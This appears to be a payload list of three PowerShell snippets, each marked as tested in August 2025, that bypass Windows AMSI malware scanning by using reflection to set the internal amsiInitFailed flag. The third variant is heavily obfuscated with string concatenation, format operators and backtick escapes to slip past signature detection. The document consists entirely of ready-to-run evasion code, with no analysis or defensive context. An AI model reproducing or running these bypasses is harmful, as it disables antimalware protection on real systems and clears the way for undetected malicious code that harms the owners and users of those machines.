============================
Tested - August 03, 2025
============================
# AMSI Init flag bypass
$u = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")
$f = $u.GetField("amsiInitFailed", "NonPublic,Static")
$f.SetValue($null, $true)
============================

============================
Tested - August 03, 2025
============================
$amsi = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")
$field = $amsi.GetField("amsiInitFailed", 'NonPublic,Static')
$field.SetValue($null, $true)
============================

============================
Tested - August 03, 2025
============================
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
============================
